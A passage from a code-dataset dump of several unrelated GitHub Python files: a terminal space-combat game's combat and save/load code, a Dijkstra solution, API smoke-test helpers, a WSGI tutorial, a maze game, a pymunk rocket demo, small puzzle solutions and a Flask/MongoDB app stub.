## Update screen with repair data \r\n print_combat_screen(1)\r\n print(f'\\n\\tShip Repaired +{str(repair_amount)} hp')\r\n getch()\r\n \r\n ## End Turn\r\n turn_completed = True\r\n\r\n else:\r\n print('\\t** NO REPAIRKITS **')\r\n getch()\r\n\r\n else:\r\n pass\r\n\r\n ## Once turn is completed and the enemy isn't dead, go to enemy turn\r\n if turn_completed and enemyData.current_enemy.hp > 0:\r\n enemyTurn()\r\n\r\n\r\ndef enemyTurn():\r\n\r\n clear()\r\n\r\n ## Generate critical chances\r\n critical_generator = random.randint(1,17)\r\n\r\n ## Check for miss or crit hit\r\n if critical_generator == 1:\r\n print_combat_screen(2)\r\n print(f'\\n\\t{enemyData.current_enemy.name} MISSES!')\r\n getch()\r\n \r\n elif critical_generator == 2:\r\n\r\n crit_damage = random.randint(int(round(enemyData.current_enemy.basedam * 1.5)), int(round(enemyData.current_enemy.basedam * 2.5))) + 3\r\n\r\n ## Remove damage amount from player HP\r\n playerData.HP -= crit_damage\r\n\r\n ## No negative HP on screen\r\n if playerData.HP < 0:\r\n playerData.HP = 0\r\n \r\n ## Update screen with damage results\r\n print_combat_screen(2)\r\n print(f'\\n\\t{enemyData.current_enemy.name} CRITICALLY attacks for -{str(crit_damage)} dam')\r\n getch()\r\n\r\n else:\r\n\r\n ## Damage range for enemy based on their base damage with a +3 range\r\n player_dam = random.randint(enemyData.current_enemy.basedam, enemyData.current_enemy.basedam + 3)\r\n \r\n ## Remove damage amount from player HP\r\n playerData.HP -= player_dam\r\n\r\n ## No negative HP on screen\r\n if playerData.HP < 0:\r\n playerData.HP = 0\r\n \r\n ## Update screen with damage results\r\n print_combat_screen(2)\r\n print(f'\\n\\t{enemyData.current_enemy.name} attacks for -{str(player_dam)} dam')\r\n getch()\r\n\r\n ## Death screen if killed. 
If you see this stuff in game, do better next time I guess.\r\n if playerData.HP <= 0:\r\n clear()\r\n ## Change lol\r\n print('\\n\\n\\n\\tYOU HAVE DIED\\n\\n\\tsucks to fuckin suck fuckeroni')\r\n getch()\r\n sys.exit()\r\n\r\n\r\n\r\n####################################\r\n##### SAVE / LOAD #####\r\n####################################\r\n\r\ndef save_game():\r\n ## SAVE ORDER: xpos, ypos, current_map, pl_hp, pl_gold, missiles, maxhp, stats, repairkits, candam\r\n save_xpos = str(mapData.pos_x)\r\n save_ypos = str(mapData.pos_y)\r\n save_cur_map = str(mapData.load_map_list.index(globalStates.return_map))\r\n save_hp = str(playerData.HP)\r\n save_gold = str(playerData.GOLD)\r\n save_missiles = str(playerData.MISSILES)\r\n save_max_hp = str(playerData.MAX_HP)\r\n save_stats = str(playerData.STATS)\r\n save_repairkits = str(playerData.REPAIRKITS)\r\n save_cannon_dam = str(playerData.CANNON_DAM)\r\n\r\n\r\n clear()\r\n ## Print save files and ask for file input \r\n saveFiles = []\r\n for filename in os.listdir('.'):\r\n if filename.startswith('savegame'):\r\n saveFiles.append(filename)\r\n print('\\n --SAVE AS:')\r\n print(' [1] New Save')\r\n\r\n i = 2\r\n for file in saveFiles:\r\n print(' ['+str(i)+'] '+file)\r\n i +=1\r\n print('\\n ['+str(i)+'] Back')\r\n\r\n fileChoice = bytes.decode(getch())\r\n\r\n ## Name new save file\r\n invalidChars = ['?', '\\\\', '/', ':', '\"', '<', '>', '*']\r\n if fileChoice == str(i):\r\n return\r\n else:\r\n if fileChoice == '1':\r\n ## CHECK IF 7+ save files already\r\n if len(saveFiles) >= 7:\r\n print('\\n MAXIMUM NUMBER OF SAVE FILES REACHED')\r\n getch()\r\n return \r\n else:\r\n clear()\r\n print(' ENTER A NAME FOR FILE:')\r\n name = input(' > ')\r\n for i in invalidChars:\r\n if i in name:\r\n print('\\n #INVALID CHARACTERS IN NAME#')\r\n input()\r\n return\r\n openfile = open('savegame_'+name+'.txt', 'w+')\r\n \r\n ## Try to open and rewrite save file\r\n else:\r\n try:\r\n openfile = open(saveFiles[int(fileChoice)-2], 'w+')\r\n except (ValueError, IndexError):\r\n print('> Unable to save to this file')\r\n getch()\r\n return\r\n\r\n\r\n ## WRITE DATA TO FILE\r\n ## SAVE ORDER: xpos, ypos, current_map, pl_hp, pl_gold missiles, maxhp, stats\r\n openfile.truncate()\r\n openfile.write(save_xpos); openfile.write(\"\\n\")\r\n openfile.write(save_ypos); openfile.write(\"\\n\")\r\n openfile.write(save_cur_map); openfile.write(\"\\n\")\r\n openfile.write(save_hp); openfile.write(\"\\n\")\r\n openfile.write(save_gold); openfile.write(\"\\n\")\r\n openfile.write(save_missiles); openfile.write(\"\\n\")\r\n openfile.write(save_max_hp); openfile.write(\"\\n\")\r\n openfile.write(save_stats); openfile.write(\"\\n\")\r\n openfile.write(save_repairkits) ; openfile.write(\"\\n\")\r\n openfile.write(save_cannon_dam) ; openfile.write(\"\\n\") \r\n\r\n print(f'\\n ** GAME SAVED **')\r\n getch()\r\n \r\n\r\ndef load_game():\r\n clear()\r\n\r\n ## List out all saved games in current directory\r\n saved_files_list = []\r\n for savefile in os.listdir('.'):\r\n if savefile.startswith('savegame'):\r\n saved_files_list.append(savefile)\r\n \r\n ## Print the saved files\r\n print('\\n -- SAVE FILES --')\r\n \r\n ## index numb for printing and selection\r\n i = 1\r\n for file in saved_files_list:\r\n print(' ['+str(i)+'] '+file)\r\n i+=1\r\n\r\n print('\\n ['+str(i)+'] BACK')\r\n \r\n file_choice = bytes.decode(getch())\r\n\r\n if file_choice == str(i):\r\n return\r\n else:\r\n try:\r\n load_file = open(saved_files_list[int(file_choice)-1])\r\n except (ValueError, 
IndexError):\r\n return\r\n \r\n try:\r\n ## LOAD DATA FROM FILE\r\n ## ORDER: xpos, ypos, current_map, pl_hp, pl_gold, missiles, maxhp, stats, repairkits, candam\r\n load_xpos = int(load_file.readline())\r\n load_ypos = int(load_file.readline())\r\n load_cur_map = int(load_file.readline())\r\n load_pl_hp = int(load_file.readline())\r\n load_pl_gold = int(load_file.readline())\r\n load_pl_missiles = int(load_file.readline())\r\n load_pl_max_hp = int(load_file.readline())\r\n load_pl_stats = int(load_file.readline())\r\n load_pl_repairkits = int(load_file.readline())\r\n load_pl_cannon_dam = int(load_file.readline())\r\n load_file.close()\r\n \r\n mapData.pos_x = load_xpos\r\n mapData.pos_y = load_ypos\r\n globalStates.current_map = mapData.load_map_list[load_cur_map]\r\n playerData.HP = load_pl_hp\r\n playerData.GOLD = load_pl_gold\r\n playerData.MISSILES = load_pl_missiles\r\n playerData.MAX_HP = load_pl_max_hp\r\n playerData.STATS = load_pl_stats\r\n playerData.REPAIRKITS = load_pl_repairkits\r\n playerData.CANNON_DAM = load_pl_cannon_dam\r\n \r\n print('\\n GAME LOADED')\r\n getch()\r\n\r\n globalStates.current_commands = map_commands\r\n \r\n\r\n except ValueError:\r\n clear()\r\n print('\\n\\n # SAVE FILE CORRUPTED OR EMPTY #')\r\n print(' # PLEASE SELECT A DIFFERENT FILE #')\r\n print('\\n [press key]')\r\n getch()\r\n \r\n\r\n\r\n\r\n####################################\r\n##### THE OL GAME LOOP #####\r\n#################################### \r\n\r\n\r\ndef Main():\r\n\r\n while True:\r\n\r\n ## Assign current screen (map, menu, combat) to be printed and modified\r\n current_screen = globalStates.current_map\r\n ## Assign uncalled command function for current maps avaliable inputs\r\n current_command = globalStates.current_commands\r\n\r\n clear()\r\n \r\n ## Gameplay for menus- static screens with options instead of motion\r\n if current_screen in globalStates.static_maps:\r\n if current_screen != staticMaps.menu: \r\n print(f'\\n HP: {str(playerData.HP)}/{str(playerData.MAX_HP)} G: {str(playerData.GOLD)}')\r\n for line in current_screen:\r\n print(line)\r\n \r\n ## COMBAT MODE\r\n elif current_screen in globalStates.combat_maps:\r\n \r\n ## While enemy is still alive, keep combat going\r\n if enemyData.current_enemy.hp > 0:\r\n ## Print combat map and character data\r\n print_combat_screen(0)\r\n \r\n ## Player death condition ############## dubious at best\r\n elif playerData.HP <= 0:\r\n clear()\r\n print('\\n\\n\\n\\tYOU HAVE DIED\\n\\n\\tsucks to fuckin suck fuckeroni')\r\n getch()\r\n sys.exit()\r\n \r\n ## Enemy death\r\n else:\r\n globalStates.current_map = staticMaps.console_menu\r\n globalStates.current_commands = console_commands\r\n\r\n ## random event, 1 in 6 chance player gets a free missile\r\n win_event = random.randint(1,8)\r\n \r\n ## victory message\r\n print(f'\\n\\n\\t +++VICTORY+++ \\n\\n\\t{enemyData.current_enemy.name} is defeated\\n\\n\\t +{str(globalStates.won_gold)}gp')\r\n \r\n ## if win, give shit and whatnot\r\n if win_event == 2:\r\n print('\\n You scavenge +1 missile')\r\n playerData.MISSILES += 1\r\n elif win_event == 8:\r\n print('\\n You scavenge +1 repairkit')\r\n playerData.REPAIRKITS += 1\r\n\r\n getch()\r\n continue\r\n\r\n\r\n ## GAMEPLAY DYNAMIC MODE\r\n else:\r\n ## erase last player location\r\n overwrite_map(current_screen)\r\n ## Set current coordinates on the map to pl character\r\n current_screen[mapData.pos_x][mapData.pos_y] = 'X'\r\n print_map(current_screen)\r\n\r\n \r\n ## Get the ol player input key\r\n player_input = 
bytes.decode(getch())\r\n\r\n ## Run input through the current commands to get results\r\n returnAction = current_command(player_input, current_screen)\r\n \r\n\r\n\r\n## Assign player commands at runtime\r\nglobalStates.current_commands = map_commands\r\nMain()","repo_name":"orsini1138/AmEn2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":30201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72553883432","text":"import heapq\nimport sys\n\ninput = sys.stdin.readline\n\nV, E = map(int, input().split())\nK = int(input())\ngraph = [[] for y in range(V + 1)]\n\nINF = int(1e9)\nfor _ in range(E):\n u, v, w = map(int, input().split())\n graph[u].append((v,w))\n\n#print(graph)\nD = [INF] * (V + 1)\n\ndef dijkstra(start):\n q = []\n heapq.heappush(q, (0,start))\n D[start] = 0\n\n while q:\n dist, now = heapq.heappop(q)\n if D[now] < dist:\n continue\n for i in graph[now]: # 0: dist 1: weight\n cost = dist + i[1]\n if cost < D[i[0]]:\n D[i[0]] = cost\n heapq.heappush(q, (cost,i[0]))\n\ndijkstra(K)\n\nfor i in range(1, V + 1):\n if D[i] == INF:\n print('INF')\n else:\n print(D[i])\n\n","repo_name":"jayyeong/Algorithm","sub_path":"Baekjoon/BOJproblem/BOJ1753최단경로_2.py","file_name":"BOJ1753최단경로_2.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"455550629","text":"# coding: utf8\n\ndef _get_thread_urls(thread):\n \"\"\"Вызов нитки с разными параметрами\"\"\"\n return [\n lambda: f'v3/thread/?uid={thread.uid}',\n lambda: f'v3/thread/?uid={thread.uid}&date={thread.start_date}',\n lambda: f'v3/thread/?uid={thread.uid}&from={thread.station_from}&to={thread.station_to}',\n lambda: f'v3/thread/?uid={thread.uid}&from={thread.station_from}&to={thread.station_to}'\n f'&date={thread.start_date}',\n lambda: f'v3/thread/?uid={thread.uid}&from={thread.station_from}&to={thread.station_to}'\n f'&date={thread.start_date}&result_timezone=Europe%2FLondon',\n ]\n\n\nclass ThreadParams(object):\n \"\"\"Нитка, полученная в поиске, и используемая потом для вызова ручки нитки\"\"\"\n def set_params(self, uid, station_from, station_to, start_date):\n self.uid = uid\n self.station_from = station_from\n self.station_to = station_to\n self.start_date = start_date\n\n\nclass SetThread(object):\n def __init__(self, thread):\n self.thread = thread\n\n def __call__(self, checker, response):\n segment = response.json()['segments'][0]\n\n self.thread.set_params(\n uid=segment['thread']['uid'],\n station_from=segment['from']['code'],\n station_to=segment['to']['code'],\n start_date=segment['start_date']\n )\n\n\ndef check_threads(search_url, search_url_params):\n \"\"\"\n Запуск тестов для нитки\n :param search_url: поиск, из результатов которого выбирается нитка\n :param params: параметры для вызова поиска\n \"\"\"\n thread = ThreadParams()\n url_params = search_url_params.copy()\n url_params['processes'] = [SetThread(thread)]\n thread_urls = _get_thread_urls(thread)\n\n return [\n search_url,\n url_params,\n thread_urls\n ]\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"travel/smoke_tests/smoke_tests/config/api_public/content_checkers.py","file_name":"content_checkers.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2821118","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nr'''\n # Web开发-WSGI接口:WSGI处理函数\n 
# 使用场景:\n 正确的做法是底层代码由专门的服务器软件实现,我们用Python专注于生成HTML文档。因为我们不希望接触到TCP连接、HTTP原始请求和响应格式,所以,需要一个统一的接口,让我们专心用Python编写Web业务。\n 这个接口就是WSGI:Web Server Gateway Interface。\n WSGI接口定义非常简单,它只要求Web开发者实现一个函数,就可以响应HTTP请求。我们来看一个最简单的Web版本的“Hello, web!”:\n def application(environ, start_response):\n start_response('200 OK', [('Content-Type', 'text/html')])\n return [b'
<h1>Hello, web!</h1>
'] \n 上面的application()函数就是符合WSGI标准的一个HTTP处理函数,它接收两个参数:\n 1、environ:一个包含所有HTTP请求信息的dict对象;\n 2、start_response:一个发送HTTP响应的函数。 \n 在application()函数中,调用:\n start_response('200 OK', [('Content-Type', 'text/html')])\n 就发送了HTTP响应的Header,注意Header只能发送一次,也就是只能调用一次start_response()函数。start_response()函数接收两个参数,一个是HTTP响应码,一个是一组list表示的HTTP Header,每个Header用一个包含两个str的tuple表示。\n 通常情况下,都应该把Content-Type头发送给浏览器。其他很多常用的HTTP Header也应该发送。\n 然后,函数的返回值b'
<h1>Hello, web!</h1>
'将作为HTTP响应的Body发送给浏览器。\n 有了WSGI,我们关心的就是如何从environ这个dict对象拿到HTTP请求信息,然后构造HTML,通过start_response()发送Header,最后返回Body。\n 整个application()函数本身没有涉及到任何解析HTTP的部分,也就是说,底层代码不需要我们自己编写,我们只负责在更高层次上考虑如何响应请求就可以了。\n 不过,等等,这个application()函数怎么调用?如果我们自己调用,两个参数environ和start_response我们没法提供,返回的bytes也没法发给浏览器。\n 所以application()函数必须由WSGI服务器来调用。有很多符合WSGI规范的服务器,我们可以挑选一个来用。但是现在,我们只想尽快测试一下我们编写的application()函数真的可以把HTML输出到浏览器,所以,要赶紧找一个最简单的WSGI服务器,把我们的Web应用程序跑起来。\n 好消息是Python内置了一个WSGI服务器,这个模块叫wsgiref,它是用纯Python编写的WSGI服务器的参考实现。所谓“参考实现”是指该实现完全符合WSGI标准,但是不考虑任何运行效率,仅供开发和测试使用。 \n\n'''\n# 我们先编写*_hello*.py,实现Web应用程序的WSGI处理函数:\n\ndef application(environ, start_response):\n start_response('200 OK', [('Content-Type', 'text/html')])\n path = environ['PATH_INFO'].encode('iso-8859-1').decode('utf-8')[1:]\n # print('path =', path)\n body = '
<h1>Hello, %s!</h1>
' % (path or 'web') # 解决输入中文乱码问题,不可以输中文: (environ['PATH_INFO'][1:] or 'web')\n # print('body =', body)\n return [body.encode('utf-8')] # 中文换为:[body.encode('gbk')]\n # return [b'
<h1>Hello, Web!</h1>
']\n\nr'''\n #注:然后,再编写一个*_server*.py,负责启动WSGI服务器,加载application()函数;\n 如果你觉得这个Web应用太简单了,可以稍微改造一下,从environ里读取PATH_INFO,这样可以显示更加动态的内容:\n # *_hello*.py可以做如下改造\n def application(environ, start_response):\n start_response('200 OK', [('Content-Type', 'text/html')])\n body = '
<h1>Hello, %s!</h1>
' % (environ['PATH_INFO'][1:] or 'web')\n return [body.encode('utf-8')]\n\n'''","repo_name":"CowryGolden/PythonTest","sub_path":"test/web_dev_wsgi_application_hello_test1.py","file_name":"web_dev_wsgi_application_hello_test1.py","file_ext":"py","file_size_in_byte":4080,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30340051829","text":"# handles interaction between user_main.py, player.py, prim.py and kruskal.py\r\n# also handles drawing the maze boards\r\n\r\nfrom player import *\r\nfrom random import *\r\nfrom prim import *\r\nfrom kruskal import *\r\nfrom math import *\r\n\r\nclass Maze(object):\r\n puzzles = [\"kruskal\", \"prim\"]\r\n\r\n def initMaze(rows, cols, value=None):\r\n # returns 2D Maze Board \r\n # copied from https://www.cs.cmu.edu/~112/notes/notes-2d-lists.html\r\n a = []\r\n for row in range(rows):\r\n for col in range(cols):\r\n a += [ [value] * cols]\r\n return a\r\n\r\n def __init__(self, rows, cols, cellSize, width, height, puzzle=\"\"):\r\n # initializes a type of puzzle randomly only for debugging purposes\r\n self.rows = rows\r\n self.cols = cols\r\n self.board = Maze.initMaze(rows, cols)\r\n self.cellSize = cellSize\r\n self.width = width\r\n self.height = height\r\n self.player = Player(cellSize)\r\n self.walls = None\r\n if puzzle == \"\":\r\n puzzle = choice(Maze.puzzles)\r\n if puzzle == \"kruskal\":\r\n self.walls = Kruskal(rows, cols, cellSize, self.board)\r\n else:\r\n self.walls = Prim(rows, cols, cellSize, self.board)\r\n\r\n def draw(self, canvas, exitImg):\r\n # main function which calls another drawing function\r\n canvas.create_rectangle(0, 0, self.width, self.height, \r\n fill=\"mint cream\")\r\n self.drawMaze(canvas, exitImg)\r\n\r\n def drawMaze(self, canvas, exitImg):\r\n # draws the maze and the player\r\n walls = self.walls\r\n for wall in walls:\r\n (x0, y0, x1, y1) = getValues(wall, self.cellSize)\r\n canvas.create_line(x0, y0, x1, y1, width=2, fill=\"black\")\r\n self.player.draw(canvas)\r\n lx = (self.cols - 1) * self.cellSize + self.cellSize/2\r\n ly = (self.rows - 1) * self.cellSize + self.cellSize/2\r\n canvas.create_image(lx, ly, image=exitImg)\r\n\r\n def checkBounds(self, x, y):\r\n # checks for collisions of player with walls or going off the board\r\n if (((x - self.player.radius < 0) or \r\n (x + self.player.radius > self.width)) or \r\n ((y - self.player.radius < 0) or \r\n (y + self.player.radius > self.height))):\r\n # off the board check\r\n return False\r\n for wall in self.walls:\r\n ((frow, fcol), (srow, scol)) = wall\r\n (x0, y0, x1, y1) = getValues(wall, self.cellSize)\r\n if frow == srow:\r\n # horizontal wall check\r\n diff = abs(y - y0)\r\n if (diff < self.player.radius and \r\n (x0 <= x-self.player.radius <= x1 or \r\n x0 <= x+self.player.radius <= x1)):\r\n return False\r\n if fcol == scol:\r\n # vertical wall check\r\n diff = abs(x - x0)\r\n if (diff < self.player.radius and \r\n (y0 <= y-self.player.radius <= y1 or \r\n y0 <= y+self.player.radius <= y1)):\r\n return False\r\n return True\r\n\r\n def onKeyPressed(self, direction):\r\n # controls the movement of Player \r\n # sends updated values to check if within bounds, and then makes move\r\n x, y = self.player.x, self.player.y\r\n if direction == \"Up\" and self.checkBounds(x, y-self.player.speed):\r\n self.player.moveUp()\r\n elif direction == \"Down\" and self.checkBounds(x, y+self.player.speed):\r\n self.player.moveDown()\r\n elif direction == \"Right\" and self.checkBounds(x+self.player.speed, 
y):\r\n self.player.moveRight()\r\n elif direction == \"Left\" and self.checkBounds(x-self.player.speed, y):\r\n self.player.moveLeft()\r\n if ((self.player.x+self.player.radius>=(self.cols-1)*self.cellSize+self.cellSize/2)\r\n and (self.player.y+self.player.radius>=(self.rows-1)*self.cellSize+self.cellSize/2)):\r\n # checks if game is won\r\n return True\r\n\r\ndef getValues(wall, cellSize):\r\n # finds the pixel coordinates of wall\r\n ((frow, fcol), (srow, scol)) = wall\r\n x0 = fcol * cellSize\r\n y0 = frow * cellSize\r\n x1 = scol * cellSize\r\n y1 = srow * cellSize\r\n return (x0, y0, x1, y1)","repo_name":"sbhotika/15112-term-project","sub_path":"Maze.py","file_name":"Maze.py","file_ext":"py","file_size_in_byte":4329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37295802809","text":"import math\n\nimport pymunk\nfrom pymunk.pyglet_util import DrawOptions\nfrom pymunk.vec2d import Vec2d\n\nimport pyglet\n\nwindow = pyglet.window.Window(900, 600, \"Rocketry\", resizable=False)\noptions = DrawOptions()\n\nspace = pymunk.Space()\nspace.gravity = 0, 0\n\ndef centroid(vertices, weights=None):\n num = len(vertices)\n if weights is None:\n weights = [1 / num] * num\n \n xsum = 0\n ysum = 0\n for i, v in enumerate(vertices):\n xsum += v[0] * weights[i]\n ysum += v[1] * weights[i]\n \n return (xsum, ysum)\n\n\nclass Part:\n STACKED = 0\n RADIAL = 1\n\n def __init__(self):\n self.vertices = [(0, 0)]\n\n self.mount = Part.STACKED\n\n self.mass = 0\n self.radial_size = 0 # only applies to circular parts\n self.height = 0\n\n self.impact_tolerance = 0 # mps\n self.heat_tolerance = 0\n\n def move_to(self, x, y):\n self.vertices = [(v[0] + x, v[1] + y) for v in self.vertices]\n\n\nclass Engine(Part):\n def __init__(self):\n super().__init__()\n\n self.radial_size = 90\n self.height = 180\n\n self.mass = 150\n self.burn = 8.8\n self.burning = False\n self.atm_thrust = 162.91\n self.vac_thrust = 192.0\n\n def engage(self):\n self.burning = True\n\n def get_impulse(self, dt):\n if self.burning:\n self.burn -= dt\n bottom_left = self.vertices[0]\n impulse_x = bottom_left[0] + self.radial_size // 2\n impulse_y = bottom_left[1] - self.height // 2\n return (impulse_x, impulse_y, self.atm_thrust)\n else:\n return (0, 0, 0)\n\n\nclass Rocket:\n def __init__(self):\n self.parts = []\n\n def add_part(self, part):\n self.parts.append(part)\n\n def get_body_and_shape(self):\n # compile part data\n vertices = []\n mass = 0\n centroids_map = {}\n for p in self.parts:\n vertices += p.vertices\n mass += p.mass\n centroids_map[centroid(p.vertices)] = p.mass\n\n # calculate center of mass\n weighted_centroids_map = {c: m / mass for c, m in centroids_map.items()}\n centroids = list(weighted_centroids_map.keys())\n weights = [weighted_centroids_map[c] for c in centroids]\n com = centroid(centroids, weights)\n\n # calculate offset\n vertices = list(set(vertices))\n center = centroid(vertices)\n offset = Vec2d(center) - Vec2d(com)\n\n # create body\n body = pymunk.Body(mass)\n shape = pymunk.Poly(body, vertices)\n body.moment = pymunk.moment_for_poly(mass, vertices)\n body.center_of_gravity = com\n body.position = 450, 300\n\n return body, shape, body.local_to_world(com)\n\npod = Part()\npod.vertices = [(0, 0), (45, 90), (90, 0)]\npod.mass = 10\n\nengine = Engine()\nengine.vertices = [(0, 0), (0, -engine.height), (engine.radial_size, -engine.height), (engine.radial_size, 0)]\nengine.engage()\n\nrocket = Rocket()\nrocket.parts = [pod, engine]\n\nbody, shape, 
com = rocket.get_body_and_shape()\nspace.add(body, shape)\n\nlabel = pyglet.text.Label(\"Center Of Mass\",\n font_size=8,\n x=com[0], y=com[1],\n anchor_x=\"center\", anchor_y=\"center\")\nx, y = body.local_to_world((45, 90))\nlabel2 = pyglet.text.Label(\"(45, 90)\",\n font_size=8,\n x=x, y=y,\n anchor_x=\"center\", anchor_y=\"center\")\n \n\n@window.event\ndef on_draw():\n window.clear()\n space.debug_draw(options)\n label.draw()\n label2.draw()\n\ndef update(dt):\n global label2\n\n # get_impulse consumes burn time, so call it once per frame and reuse the values\n impulse_x, impulse_y, impulse_amount = engine.get_impulse(dt)\n x, y = body.local_to_world((impulse_x, impulse_y))\n label2 = pyglet.text.Label(\"Impulse\",\n font_size=8,\n x=x, y=y,\n anchor_x=\"center\", anchor_y=\"center\")\n\n body.apply_impulse_at_local_point((0, impulse_amount), (impulse_x, impulse_y))\n space.step(dt)\n\nif __name__ == \"__main__\":\n pyglet.clock.schedule_interval(update, 1.0 / 60.0)\n pyglet.app.run()\n","repo_name":"henrymwestfall/Pyglet-Pymunk-Test","sub_path":"rocket.py","file_name":"rocket.py","file_ext":"py","file_size_in_byte":4232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"23070082037","text":"def bin_rota(arr):\n resp = []\n for i,v in enumerate(arr):\n if i%2==0: resp+=v\n else: resp+=list(reversed(v))\n return resp\n\n\ndef bin_rota_up(arr):\n return [name for i, row in enumerate(arr) for name in row[::-1 if i%2 else 1]]\n\n\n\nprint(bin_rota([[\"Stefan\", \"Raj\", \"Marie\"],\n [\"Alexa\", \"Amy\", \"Edward\"],\n [\"Liz\", \"Claire\", \"Juan\"],\n [\"Dee\", \"Luke\", \"Katie\"]]))\nprint(bin_rota_up([[\"Stefan\", \"Raj\", \"Marie\"],\n [\"Alexa\", \"Amy\", \"Edward\"],\n [\"Liz\", \"Claire\", \"Juan\"],\n [\"Dee\", \"Luke\", \"Katie\"]]))\n\n\n","repo_name":"igruiz91/Codewars-HackerRank-LeetCode-CoderBite-freeCodeCamp","sub_path":"Codewars/Python/7 kyu/II/The Lazy Startup Office.py","file_name":"The Lazy Startup Office.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
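The two `bin_rota` variants in the record above flatten a seating plan in boustrophedon (zig-zag) order: even-indexed rows left-to-right, odd-indexed rows reversed. A minimal sketch of the same idea as a lazy generator, so a very large rota never has to be materialized at once; the `zigzag` name is hypothetical and not part of the original solution:

```python
from typing import Iterable, Iterator, List

def zigzag(rows: Iterable[List[str]]) -> Iterator[str]:
    # Even-indexed rows are walked left-to-right, odd-indexed rows
    # right-to-left, yielding one name at a time.
    for i, row in enumerate(rows):
        yield from (reversed(row) if i % 2 else row)

rota = [["Stefan", "Raj", "Marie"],
        ["Alexa", "Amy", "Edward"]]
assert list(zigzag(rota)) == ["Stefan", "Raj", "Marie", "Edward", "Amy", "Alexa"]
```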
+{"seq_id":"2767885388","text":"\"\"\"\nAssignment 1\nBuilding on Hero, add a new mage hero with the following extras:\n\nMage\n New attribute: magic points (magical, default 0, max 100)\n\n - Attack:\n each call: anger `+2`\n each call: magic `+5`\n\n - Ultimate\n cast the ultimate automatically when magic is full\n\n - Second form\n when anger is full, switch to the second form automatically (max magic becomes 50)\n\"\"\"\n\n\nclass Hero:\n def __init__(self, name, weapon, equipment, power, blood, anger):\n self.name = name\n self.weapon = weapon\n self.equipment = equipment\n self.power = power\n self.blood = blood\n self.anger = anger\n\n def attack(self):\n print(f'{self.name} attacks!')\n self.anger += 2\n\n if self.anger == 100: # anger is full\n self.big_data()\n\n def big_data(self):\n print(f'{self.name} casts the ultimate!')\n self.anger = 0\n\n\nclass Mage(Hero):\n def __init__(self, name, weapon, equipment, power, blood, anger):\n super().__init__(name, weapon, equipment, power, blood, anger)\n self.magical = 0\n\n def second_form(self):\n print(f'{self.name} switches to the second form')\n if self.magical >= 50:\n self.big_data()\n self.anger = 0\n print(f'{self.name} reverts to normal form')\n\n def big_data(self):\n print(f'{self.name} casts the ultimate!')\n self.magical = 0\n\n def attack(self): # !!!! the key method\n print(f'{self.name} attacks!')\n self.magical += 5\n self.anger += 2\n\n if self.magical == 100:\n self.big_data()\n\n elif self.anger == 100:\n self.second_form()\n\n\nmage1 = Mage('mighty mage', 'magic wand', 'broom', 0, 100, 78)\nfor i in range(100):\n mage1.attack()\n print(mage1.magical)\n print(mage1.anger)\n\n'''\n!!!! Approach !!!!\nWhat is the second form for --> it drops the max magic to 50, so 50 magic is enough to cast the ultimate -->\ninside second_form(), check the magic at transformation time: if it is at least 50, cast the ultimate. With less\nthan 50 the ultimate cannot be cast; afterwards anger resets to 0. Since the spec says the second form triggers\nautomatically at 100 anger, whether the ultimate actually fires also depends on luck: magic may not have reached\n50 by the time of the transformation.\n'''\n","repo_name":"lll13508510371/hexin","sub_path":"核心/10 类与继承/03 课后作业/0015-10-00000001-对象继承.py","file_name":"0015-10-00000001-对象继承.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"3436000870","text":"import heapq\nfrom typing import List\nclass Solution:\n def constrainedSubsetSum(self, nums: List[int], k: int) -> int:\n l = len(nums)\n first_pos = l\n last_pos = -1\n for i,v in enumerate(nums):\n if v > 0:\n first_pos = min(first_pos, i)\n last_pos = max(last_pos, i)\n if last_pos == -1:\n return max(nums)\n\n\n l = len(nums)\n q = [(-nums[first_pos], first_pos)]\n for i in range(first_pos+1, last_pos+1):\n while q and q[0][1] + k < i:\n heapq.heappop(q)\n\n waspos = nums[i] >= 0\n\n nums[i] += max(0, -q[0][0])\n \n if waspos:\n q = []\n \n heapq.heappush(q, (-nums[i], i))\n #print(nums)\n return max(nums)\n","repo_name":"jlcarr/LeetCode","sub_path":"Problem_1425/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"69972747432","text":"import pymongo\nfrom flask import Flask, render_template, url_for, request, flash, redirect, jsonify, send_file, session\nfrom flask_cors import CORS, cross_origin\nfrom bson.json_util import dumps\nimport json\napp = Flask(__name__)\nfrom update_route import *\nmongo = pymongo.MongoClient(host=\"localhost\",port=27017)\ndb=mongo.algoinvstr\n\n@app.route('/')\ndef index():\n niftyv = db.nifty.find()\n companylist = db.toptwenty.find()\n return render_template('index.html',nifty=niftyv[0][\"cur_val\"],nifty_high=niftyv[0][\"all_time_high\"],change_per=niftyv[0][\"down_per\"],mylist=companylist,time=niftyv[0][\"time\"],date=niftyv[0][\"date\"])\n\n@app.route('/update')\ndef call():\n updatecalled()\n niftyv = db.nifty.find()\n companylist = db.toptwenty.find()\n return render_template('index.html',nifty=niftyv[0][\"cur_val\"],nifty_high=niftyv[0][\"all_time_high\"],change_per=niftyv[0][\"down_per\"],mylist=companylist,time=niftyv[0][\"time\"],date=niftyv[0][\"date\"])\n\n\nif __name__ == \"__main__\":\n print('started')\n 